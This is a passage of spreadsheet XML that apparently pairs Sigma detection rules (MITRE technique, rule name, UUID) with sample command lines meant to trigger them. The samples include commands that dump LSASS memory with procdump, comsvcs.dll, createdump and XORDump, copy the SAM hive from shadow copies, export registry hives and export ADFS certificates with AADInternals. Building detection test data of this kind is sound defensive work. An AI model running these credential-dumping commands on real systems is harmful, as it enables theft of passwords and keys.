      <c r="A572" s="43" t="inlineStr">
        <is>
          <t>t1185</t>
        </is>
      </c>
      <c r="B572" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_remote_debugging</t>
        </is>
      </c>
      <c r="C572" s="43" t="inlineStr">
        <is>
          <t>Browser Started with Remote Debugging</t>
        </is>
      </c>
      <c r="D572" s="43" t="inlineStr">
        <is>
          <t>b3d34dc5-2efd-4ae3-845f-8ec14921f449</t>
        </is>
      </c>
      <c r="E572" s="43" t="inlineStr">
        <is>
          <t>chrome.exe --remote-debugging-port=9222 --disable-gpu</t>
        </is>
      </c>
      <c r="F572" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G572" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H572" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I572" s="43" t="n"/>
      <c r="J572" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K572" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="573" ht="15.75" customHeight="1" s="42">
      <c r="A573" s="43" t="inlineStr">
        <is>
          <t>t1185</t>
        </is>
      </c>
      <c r="B573" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_remote_debugging</t>
        </is>
      </c>
      <c r="C573" s="43" t="inlineStr">
        <is>
          <t>Browser Started with Remote Debugging</t>
        </is>
      </c>
      <c r="D573" s="43" t="inlineStr">
        <is>
          <t>b3d34dc5-2efd-4ae3-845f-8ec14921f449</t>
        </is>
      </c>
      <c r="E573" s="43" t="inlineStr">
        <is>
          <t>firefox.exe -start-debugger-server 9222</t>
        </is>
      </c>
      <c r="F573" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G573" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H573" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I573" s="43" t="n"/>
      <c r="J573" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K573" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="574" ht="15.75" customHeight="1" s="42">
      <c r="A574" s="43" t="inlineStr">
        <is>
          <t>execution</t>
        </is>
      </c>
      <c r="B574" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_aadinternals_cmdlets_execution</t>
        </is>
      </c>
      <c r="C574" s="43" t="inlineStr">
        <is>
          <t>AADInternals PowerShell Cmdlets Execution - ProccessCreation</t>
        </is>
      </c>
      <c r="D574" s="43" t="inlineStr">
        <is>
          <t>c86500e9-a645-4680-98d7-f882c70c1ea3</t>
        </is>
      </c>
      <c r="E574" s="43" t="inlineStr">
        <is>
          <t>"powershell.exe" -Command "&amp; {Import-Module AADInternals -Force; Export-AADIntADFSCertificates; Get-ChildItem | Where-Object {$_ -like 'ADFS*'}; Write-Host '`nCertificates retrieved successfully'}"</t>
        </is>
      </c>
      <c r="F574" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G574" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H574" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I574" s="43" t="n"/>
      <c r="J574" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K574" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="575" ht="15.75" customHeight="1" s="42">
      <c r="A575" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B575" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_createdump_lolbin_execution</t>
        </is>
      </c>
      <c r="C575" s="43" t="inlineStr">
        <is>
          <t>CreateDump Process Dump</t>
        </is>
      </c>
      <c r="D575" s="43" t="inlineStr">
        <is>
          <t>515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48</t>
        </is>
      </c>
      <c r="E575" s="43" t="inlineStr">
        <is>
          <t>"C:\\Program Files\\dotnet\\shared\\Microsoft.NETCore.App\\5.0.17\\createdump.exe" -u -f C:\\Users\\thaim\\AppData\\Local\\Temp\\dotnet-lsass.dmp 788</t>
        </is>
      </c>
      <c r="F575" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G575" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H575" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I575" s="43" t="n"/>
      <c r="J575" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K575" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="576" ht="15.75" customHeight="1" s="42">
      <c r="A576" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B576" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_dumpminitool_susp_execution</t>
        </is>
      </c>
      <c r="C576" s="43" t="inlineStr">
        <is>
          <t>Suspicious DumpMinitool Execution</t>
        </is>
      </c>
      <c r="D576" s="43" t="inlineStr">
        <is>
          <t>eb1c4225-1c23-4241-8dd4-051389fde4ce</t>
        </is>
      </c>
      <c r="E576" s="43" t="inlineStr">
        <is>
          <t>DumpMinitool.exe --file C:\Temp\memory.dmp --processId 752 --dumpType Full</t>
        </is>
      </c>
      <c r="F576" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G576" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H576" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I576" s="43" t="n"/>
      <c r="J576" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K576" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="577" ht="15.75" customHeight="1" s="42">
      <c r="A577" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B577" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_dumpminitool_susp_execution</t>
        </is>
      </c>
      <c r="C577" s="43" t="inlineStr">
        <is>
          <t>Suspicious DumpMinitool Execution</t>
        </is>
      </c>
      <c r="D577" s="43" t="inlineStr">
        <is>
          <t>eb1c4225-1c23-4241-8dd4-051389fde4ce</t>
        </is>
      </c>
      <c r="E577" s="43" t="inlineStr">
        <is>
          <t>DumpMinitool.exe --file C:\Temp\memory.dmp -processId 752 -dumpType Full</t>
        </is>
      </c>
      <c r="F577" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G577" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H577" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I577" s="43" t="n"/>
      <c r="J577" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K577" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="578" ht="15.75" customHeight="1" s="42">
      <c r="A578" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B578" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_dumpminitool_susp_execution</t>
        </is>
      </c>
      <c r="C578" s="43" t="inlineStr">
        <is>
          <t>Suspicious DumpMinitool Execution</t>
        </is>
      </c>
      <c r="D578" s="43" t="inlineStr">
        <is>
          <t>eb1c4225-1c23-4241-8dd4-051389fde4ce</t>
        </is>
      </c>
      <c r="E578" s="43" t="inlineStr">
        <is>
          <t>DumpMinitool.exe -file C:\Temp\memory.dmp --processId 752 --dumpType Full</t>
        </is>
      </c>
      <c r="F578" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G578" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H578" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I578" s="43" t="n"/>
      <c r="J578" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K578" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="579" ht="15.75" customHeight="1" s="42">
      <c r="A579" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B579" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_dumpminitool_susp_execution</t>
        </is>
      </c>
      <c r="C579" s="43" t="inlineStr">
        <is>
          <t>Suspicious DumpMinitool Execution</t>
        </is>
      </c>
      <c r="D579" s="43" t="inlineStr">
        <is>
          <t>eb1c4225-1c23-4241-8dd4-051389fde4ce</t>
        </is>
      </c>
      <c r="E579" s="43" t="inlineStr">
        <is>
          <t>DumpMinitool.exe --file C:\Temp\memory.dmp --processId 752 Full</t>
        </is>
      </c>
      <c r="F579" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G579" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H579" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I579" s="43" t="n"/>
      <c r="J579" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K579" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="580" ht="15.75" customHeight="1" s="42">
      <c r="A580" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B580" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_dumpminitool_susp_execution</t>
        </is>
      </c>
      <c r="C580" s="43" t="inlineStr">
        <is>
          <t>Suspicious DumpMinitool Execution</t>
        </is>
      </c>
      <c r="D580" s="43" t="inlineStr">
        <is>
          <t>eb1c4225-1c23-4241-8dd4-051389fde4ce</t>
        </is>
      </c>
      <c r="E580" s="43" t="inlineStr">
        <is>
          <t>DumpMinitool.exe --file C:\Temp\memory.dmp --processId 752 --dumpType Full .txt</t>
        </is>
      </c>
      <c r="F580" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G580" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H580" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I580" s="43" t="n"/>
      <c r="J580" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K580" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="581" ht="15.75" customHeight="1" s="42">
      <c r="A581" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B581" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_xordump</t>
        </is>
      </c>
      <c r="C581" s="43" t="inlineStr">
        <is>
          <t>HackTool - XORDump Execution</t>
        </is>
      </c>
      <c r="D581" s="43" t="inlineStr">
        <is>
          <t>66e563f9-1cbd-4a22-a957-d8b7c0f44372</t>
        </is>
      </c>
      <c r="E581" s="43" t="inlineStr">
        <is>
          <t>"C:\\Windows\\Temp\\xordump.exe" -out C:\\Windows\\Temp\\lsass-xordump.t1003.001.dmp -x 0x41 -process "lsass.exe" -m "comsvcs"</t>
        </is>
      </c>
      <c r="F581" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G581" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H581" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I581" s="43" t="n"/>
      <c r="J581" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K581" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="582" ht="15.75" customHeight="1" s="42">
      <c r="A582" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B582" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C582" s="43" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D582" s="43" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E582" s="43" t="inlineStr">
        <is>
          <t>createdump.exe -f /tmp/test.dmp -u 632</t>
        </is>
      </c>
      <c r="F582" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G582" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H582" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I582" s="43" t="n"/>
      <c r="J582" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K582" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="583" ht="15.75" customHeight="1" s="42">
      <c r="A583" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B583" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C583" s="43" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D583" s="43" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E583" s="43" t="inlineStr">
        <is>
          <t>createdump.exe -u -f /tmp/test.dmp 632</t>
        </is>
      </c>
      <c r="F583" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G583" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H583" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I583" s="43" t="n"/>
      <c r="J583" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K583" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="584" ht="15.75" customHeight="1" s="42">
      <c r="A584" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B584" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C584" s="43" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D584" s="43" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E584" s="43" t="inlineStr">
        <is>
          <t>createdump.exe --name /tmp/test.dmp --full 632</t>
        </is>
      </c>
      <c r="F584" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G584" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H584" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I584" s="43" t="n"/>
      <c r="J584" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K584" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="585" ht="15.75" customHeight="1" s="42">
      <c r="A585" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B585" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C585" s="43" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D585" s="43" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E585" s="43" t="inlineStr">
        <is>
          <t>createdump.exe -f "/tmp/test.dmp" -u 632</t>
        </is>
      </c>
      <c r="F585" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G585" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H585" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I585" s="43" t="n"/>
      <c r="J585" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K585" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="586" ht="15.75" customHeight="1" s="42">
      <c r="A586" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B586" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_process_dump_via_comsvcs</t>
        </is>
      </c>
      <c r="C586" s="43" t="inlineStr">
        <is>
          <t>Process Memory Dump Via Comsvcs.DLL</t>
        </is>
      </c>
      <c r="D586" s="43" t="inlineStr">
        <is>
          <t>646ea171-dded-4578-8a4d-65e9822892e3</t>
        </is>
      </c>
      <c r="E586" s="43" t="inlineStr">
        <is>
          <t>"C:\Windows\System32\rundll32.exe" C:\windows\System32\comsvcs.dll MiniDump 204 "C:\Users\thaim\AppData\Local\Temp\svchost-exe.dmp" full</t>
        </is>
      </c>
      <c r="F586" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G586" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H586" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I586" s="43" t="n"/>
      <c r="J586" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K586" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="587" ht="15.75" customHeight="1" s="42">
      <c r="A587" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B587" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_process_dump_via_comsvcs</t>
        </is>
      </c>
      <c r="C587" s="43" t="inlineStr">
        <is>
          <t>Process Memory Dump Via Comsvcs.DLL</t>
        </is>
      </c>
      <c r="D587" s="43" t="inlineStr">
        <is>
          <t>646ea171-dded-4578-8a4d-65e9822892e3</t>
        </is>
      </c>
      <c r="E587" s="43" t="inlineStr">
        <is>
          <t>"C:\Windows\System32\rundll32.exe" C:\windows\System32\comsvcs.dll,MiniDump 204 "C:\Users\thaim\AppData\Local\Temp\svchost-exe.dmp" full</t>
        </is>
      </c>
      <c r="F587" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G587" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H587" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I587" s="43" t="n"/>
      <c r="J587" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K587" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="588" ht="15.75" customHeight="1" s="42">
      <c r="A588" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B588" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_lsass</t>
        </is>
      </c>
      <c r="C588" s="43" t="inlineStr">
        <is>
          <t>Potential LSASS Process Dump Via Procdump</t>
        </is>
      </c>
      <c r="D588" s="43" t="inlineStr">
        <is>
          <t>5afee48e-67dd-4e03-a783-f74259dcf998</t>
        </is>
      </c>
      <c r="E588" s="43" t="inlineStr">
        <is>
          <t>procdump.exe -ma lsass.exe</t>
        </is>
      </c>
      <c r="F588" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G588" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H588" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I588" s="43" t="n"/>
      <c r="J588" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K588" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="589" ht="15.75" customHeight="1" s="42">
      <c r="A589" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B589" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_lsass</t>
        </is>
      </c>
      <c r="C589" s="43" t="inlineStr">
        <is>
          <t>Potential LSASS Process Dump Via Procdump</t>
        </is>
      </c>
      <c r="D589" s="43" t="inlineStr">
        <is>
          <t>5afee48e-67dd-4e03-a783-f74259dcf998</t>
        </is>
      </c>
      <c r="E589" s="43" t="inlineStr">
        <is>
          <t>procdump.exe -ma lsass</t>
        </is>
      </c>
      <c r="F589" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G589" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H589" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I589" s="43" t="n"/>
      <c r="J589" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K589" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="590" ht="15.75" customHeight="1" s="42">
      <c r="A590" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B590" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_lsass</t>
        </is>
      </c>
      <c r="C590" s="43" t="inlineStr">
        <is>
          <t>Potential LSASS Process Dump Via Procdump</t>
        </is>
      </c>
      <c r="D590" s="43" t="inlineStr">
        <is>
          <t>5afee48e-67dd-4e03-a783-f74259dcf998</t>
        </is>
      </c>
      <c r="E590" s="43" t="inlineStr">
        <is>
          <t>procdump.exe -ma "lsass.exe"</t>
        </is>
      </c>
      <c r="F590" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G590" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H590" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I590" s="43" t="n"/>
      <c r="J590" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K590" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="591" ht="15.75" customHeight="1" s="42">
      <c r="A591" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B591" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_citrix_trolleyexpress_procdump</t>
        </is>
      </c>
      <c r="C591" s="43" t="inlineStr">
        <is>
          <t>Process Access via TrolleyExpress Exclusion</t>
        </is>
      </c>
      <c r="D591" s="43" t="inlineStr">
        <is>
          <t>4c0aaedc-154c-4427-ada0-d80ef9c9deb6</t>
        </is>
      </c>
      <c r="E591" s="43" t="inlineStr">
        <is>
          <t>TrolleyExpress.exe 755</t>
        </is>
      </c>
      <c r="F591" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G591" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H591" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I591" s="43" t="n"/>
      <c r="J591" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K591" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="592" ht="15.75" customHeight="1" s="42">
      <c r="A592" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B592" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_citrix_trolleyexpress_procdump</t>
        </is>
      </c>
      <c r="C592" s="43" t="inlineStr">
        <is>
          <t>Process Access via TrolleyExpress Exclusion</t>
        </is>
      </c>
      <c r="D592" s="43" t="inlineStr">
        <is>
          <t>4c0aaedc-154c-4427-ada0-d80ef9c9deb6</t>
        </is>
      </c>
      <c r="E592" s="43" t="inlineStr">
        <is>
          <t>TrolleyExpress.exe -ma 755</t>
        </is>
      </c>
      <c r="F592" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G592" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H592" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I592" s="43" t="n"/>
      <c r="J592" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K592" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="593" ht="15.75" customHeight="1" s="42">
      <c r="A593" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B593" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_citrix_trolleyexpress_procdump</t>
        </is>
      </c>
      <c r="C593" s="43" t="inlineStr">
        <is>
          <t>Process Access via TrolleyExpress Exclusion</t>
        </is>
      </c>
      <c r="D593" s="43" t="inlineStr">
        <is>
          <t>4c0aaedc-154c-4427-ada0-d80ef9c9deb6</t>
        </is>
      </c>
      <c r="E593" s="43" t="inlineStr">
        <is>
          <t>TrolleyExpress.exe 1044</t>
        </is>
      </c>
      <c r="F593" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G593" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H593" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I593" s="43" t="n"/>
      <c r="J593" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K593" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="594" ht="15.75" customHeight="1" s="42">
      <c r="A594" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B594" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_citrix_trolleyexpress_procdump</t>
        </is>
      </c>
      <c r="C594" s="43" t="inlineStr">
        <is>
          <t>Process Access via TrolleyExpress Exclusion</t>
        </is>
      </c>
      <c r="D594" s="43" t="inlineStr">
        <is>
          <t>4c0aaedc-154c-4427-ada0-d80ef9c9deb6</t>
        </is>
      </c>
      <c r="E594" s="43" t="inlineStr">
        <is>
          <t>TrolleyExpress.exe 700</t>
        </is>
      </c>
      <c r="F594" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G594" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H594" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I594" s="43" t="n"/>
      <c r="J594" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K594" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="595" ht="15.75" customHeight="1" s="42">
      <c r="A595" s="43" t="inlineStr">
        <is>
          <t>t1003.002</t>
        </is>
      </c>
      <c r="B595" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_mklink_shadow_copies_access_symlink</t>
        </is>
      </c>
      <c r="C595" s="43" t="inlineStr">
        <is>
          <t>VolumeShadowCopy Symlink Creation Via Mklink</t>
        </is>
      </c>
      <c r="D595" s="43" t="inlineStr">
        <is>
          <t>40b19fa6-d835-400c-b301-41f3a2baacaf</t>
        </is>
      </c>
      <c r="E595" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c vssadmin create shadow /for=C: &amp; mklink /D C:\Temp\vssstore \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1</t>
        </is>
      </c>
      <c r="F595" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G595" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H595" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I595" s="43" t="n"/>
      <c r="J595" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K595" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="596" ht="15.75" customHeight="1" s="42">
      <c r="A596" s="43" t="inlineStr">
        <is>
          <t>t1003.002</t>
        </is>
      </c>
      <c r="B596" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_sam_access</t>
        </is>
      </c>
      <c r="C596" s="43" t="inlineStr">
        <is>
          <t>PowerShell SAM Copy</t>
        </is>
      </c>
      <c r="D596" s="43" t="inlineStr">
        <is>
          <t>1af57a4b-460a-4738-9034-db68b880c665</t>
        </is>
      </c>
      <c r="E596" s="43" t="inlineStr">
        <is>
          <t>powershell.exe [System.IO.File]::Copy("\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM", "${env:TEMP}\SAMvss1", $true)</t>
        </is>
      </c>
      <c r="F596" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G596" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H596" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I596" s="43" t="n"/>
      <c r="J596" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K596" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="597" ht="15.75" customHeight="1" s="42">
      <c r="A597" s="43" t="inlineStr">
        <is>
          <t>t1003.002</t>
        </is>
      </c>
      <c r="B597" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_sam_access</t>
        </is>
      </c>
      <c r="C597" s="43" t="inlineStr">
        <is>
          <t>PowerShell SAM Copy</t>
        </is>
      </c>
      <c r="D597" s="43" t="inlineStr">
        <is>
          <t>1af57a4b-460a-4738-9034-db68b880c665</t>
        </is>
      </c>
      <c r="E597" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; { [System.IO.File]::Copy('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\System32\config\SAM', '$env:TEMP\SAMvss2', $true) }"</t>
        </is>
      </c>
      <c r="F597" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G597" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H597" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I597" s="43" t="n"/>
      <c r="J597" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K597" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="598" ht="15.75" customHeight="1" s="42">
      <c r="A598" s="43" t="inlineStr">
        <is>
          <t>t1003.002</t>
        </is>
      </c>
      <c r="B598" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_sam_access</t>
        </is>
      </c>
      <c r="C598" s="43" t="inlineStr">
        <is>
          <t>PowerShell SAM Copy</t>
        </is>
      </c>
      <c r="D598" s="43" t="inlineStr">
        <is>
          <t>1af57a4b-460a-4738-9034-db68b880c665</t>
        </is>
      </c>
      <c r="E598" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c "[System.IO.File]::Copy('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Windows\System32\config\SAM', '$env:TEMP\SAMvss3', $true)"</t>
        </is>
      </c>
      <c r="F598" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G598" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H598" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I598" s="43" t="n"/>
      <c r="J598" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K598" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="599" ht="15.75" customHeight="1" s="42">
      <c r="A599" s="43" t="inlineStr">
        <is>
          <t>t1003.002</t>
        </is>
      </c>
      <c r="B599" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_dumping_sensitive_hives</t>
        </is>
      </c>
      <c r="C599" s="43" t="inlineStr">
        <is>
          <t>Dumping of Sensitive Hives Via Reg.EXE</t>
        </is>
      </c>
      <c r="D599" s="43" t="inlineStr">
        <is>
          <t>fd877b94-9bb5-4191-bb25-d79cbd93c167</t>
        </is>
      </c>
      <c r="E599" s="43" t="inlineStr">
        <is>
          <t>reg export "HKLM\sam" C:\Users\thaim\AppData\Local\Temp\sam</t>
        </is>
      </c>
      <c r="F599" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G599" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H599" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I599" s="43" t="n"/>
      <c r="J599" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K599" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="600" ht="15.75" customHeight="1" s="42">
      <c r="A600" s="43" t="inlineStr">
        <is>
